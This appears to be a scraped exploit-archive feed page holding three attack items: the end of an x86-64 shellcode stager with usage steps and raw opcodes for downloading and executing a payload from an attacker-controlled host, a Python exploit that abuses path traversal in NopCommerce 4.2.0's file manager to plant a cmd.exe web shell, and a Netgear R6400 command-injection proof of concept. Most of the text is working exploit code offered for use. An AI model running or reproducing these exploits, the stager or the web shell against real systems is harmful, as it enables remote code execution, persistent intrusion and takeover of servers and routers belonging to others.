;// EXIT(0) => this bit is unnecessary if your payload already calls exit()
;// =========>
xor rax, rax
mov al, 60
xor rdi, rdi
syscall


; ===============>
; ===== Usage ===>
; ===============>
; =========================================================================================
; this program downloads a secondary payload from a remote host, and executes it.
; in this example, the payload used will be a simple hello-world-like program (hello.asm):
; =========================================================================================
; global _start
; section .text
; _start:
; mov rax, 1
; mov rdi, 1
; mov rsi, 0x0a21216f6c6c6548 ; "Hello!!\n"
; push rsi
; mov rsi, rsp
; mov rdx, 8
; syscall
; mov rax, 60
; xor rdi, rdi
; syscall
; =========================================================================================
; 1.) compile your payload:
; -----------------------------------------------------------------------------------------
; nasm -f elf64 hello.asm -o hello.o && ld hello.o -o hello && rm hello.o
; =========================================================================================
; 2.) retrieve the opcodes for the payload:
; -----------------------------------------------------------------------------------------
; objdump -d hello|grep -v '^$\|start>\|file format\|Disassembly'|cut -d'' -f2-9|sed -E "s/\ [0-9a-f]{6}://g"|grep -Eo '[a-f0-9]{2}'|tr -d '\n' ; echo
; b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05
; =========================================================================================
; 3.) count how many bytes are in your payload (41 bytes) and update line 86 to reflect this:
; -----------------------------------------------------------------------------------------
; echo b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05|grep -Eo '[a-f0-9]{2}'|wc -l
; 41
; =========================================================================================
; 4.) decode the bytes into raw form and serve it via netcat listener:
; -----------------------------------------------------------------------------------------
; echo -n b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 | xxd -r -p > payload
; nc -lvp 443 < payload
; listening on [any] 443 ...
; =========================================================================================
; 5.) one last step before compiling this stager, add your own IP address to line 69:
; -----------------------------------------------------------------------------------------
; import struct, socket
; print(hex(struct.unpack('<L', socket.inet_aton('192.168.55.42'))[0]))
; 0x2a37a8c0
; =========================================================================================
; 6.) compile and run this shellcode - it will connect to your netcat listener, download & exec the raw payload
; -----------------------------------------------------------------------------------------
; nasm -f elf64 stager.asm -o stager.o && ld stager.o -o stager && rm stager.o
; ./stager
; Hello!!
; =========================================================================================


; Raw paste:
; 4831c0b006b102660fafc14831ff0f054831c0b002b106660fafc14831ff40b780666bff200f0548914831c0b0094887f94831f640b680666bf6204831d2b2074d31d241b2214d31c949c7c0ffffffff0f054989c14831c0b0294831ff48ffc748ffc74831f648ffc64831d2b2060f05505f4831c050c74424fcc0a8372a66c74424fa01bb4883ec06666a024831c0b02a4889e64831d2b2100f054c89ce4831d2b2294831c00f054831c0b0030f0541ffe14831c0b03c4831ff0f05

NopCommerce 4.2.0 Privilege Escalation

$
0
0

NopCommerce version 4.2.0 suffers from a privilege escalation vulnerability.


MD5 | 7c639c33b2a7376e378510e29b7b1747

# Vulnerability Title: NopCommerce 4.2.0 -  Privilege Escalation
# Author: Alessandro Magnosi (d3adc0de)
# Date: 2019-07-07
# Vendor Homepage: https://www.nopcommerce.com/
# Software Link : https://www.nopcommerce.com/
# Tested Version: 4.2.0
# Vulnerability Type: Privilege Escalation
# Tested on OS: Windows 10, CentOS, Docker
# Exploit designed for: NopCommerce 4.2.0 on IIS

import requests
import argparse
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

def proxy(flag):
return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None

def geturl(baseurl, type):
if type == "login":
return baseurl + "/login"
elif type == "mv":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
elif type == "mkdir":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
elif type == "put":
return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
elif type == "contactus":
return baseurl + "/contactus"
else:
return ""

def login(email, password, url, proxy):
res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
cookie = res.cookies.get_dict()
soup = BeautifulSoup(res.text, features="html.parser")
token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False)
cookies = res.cookies.get_dict()
return { **cookies, **cookie }

def shellupload(email, password, url, proxy):
print("[+] Trying uploading shell from")
cookies = login(email, password, url, proxy)
# Rename Common Directory
requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Create Common Directory
requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
# Upload File into Common
requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n<script\r\n src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t console.log(\"should change text\");\r\n cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n if (results==null){\r\n return null;\r\n }\r\n else{\r\n return decodeURI(results[1]) || 0;\r\n }\r\n }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t var currentCmd = $.urlParam('cmd');\r\n\t console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t var currentUrl = location.href;\r\n\r\n\t var paramDelimeter = \"\";\r\n\t if (currentUrl.indexOf(\"?\") < 0){\r\n\t paramDelimeter = \"?\";\r\n\t } else {\r\n\t paramDelimeter = \"&\";\r\n\t }\r\n \r\n\t if (currentUrl.indexOf(\"cmd=\") < 0){\r\n currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t }\r\n\t\r\n var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n window.location.href = newUrl;\r\n\r\n\t //console.log(newUrl);\r\n\t}\r\n\t\r\n $(\"#submitCommand\").click(function(){\r\n\t executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t if (e.which == 13) {\r\n\t executeCmd();\r\n\t return false;\r\n\t }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t var cmd = $(\"#cmd\").val();\r\n\t $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-fami
# Test if it is working
res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
soup = BeautifulSoup(res.text, features="html.parser")
test = soup.find("span", {"id" : "cmdResult"})
if test is None:
print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
else:
print("[+] Shell uploaded under contact us page")

def main():
parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
parser.add_argument(
'-e', '--email', required=True, type=str, help='Username')
parser.add_argument(
'-p', '--password', required=True, type=str, help='Password')
parser.add_argument(
'-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
parser.add_argument(
'-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')

args = parser.parse_args()

shellupload(args.email, args.password, args.url, proxy(args.proxy))

if __name__ == '__main__':
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
main()

Netgear R6400 Remote Code Execution

$
0
0

Netgear R6400 suffers from a remote code execution vulnerability.


MD5 | c60d99db4805cfbda0c14ac139d7217d

# Exploit Title: Netgear R6400 - Remote Code Execution
# Date: 2019-12-14
# Exploit Author: Kevin Randall
# CVE: CVE-2016-6277
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93

# PoC

#!/usr/bin/python

import urllib2

IP_ADDR = "192.168.1.1"
PROTOCOL = "http://"
DIRECTORY = "/cgi-bin/;"
CMD = "date"
FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD

req = urllib2.Request(url = FULL_URL)
response = urllib2.urlopen(req)
commandoutput = response.read()
spl_word = "}"
formattedoutput = commandoutput
result = formattedoutput.rpartition(spl_word)[2]
print result

Viewing all 13315 articles
Browse latest View live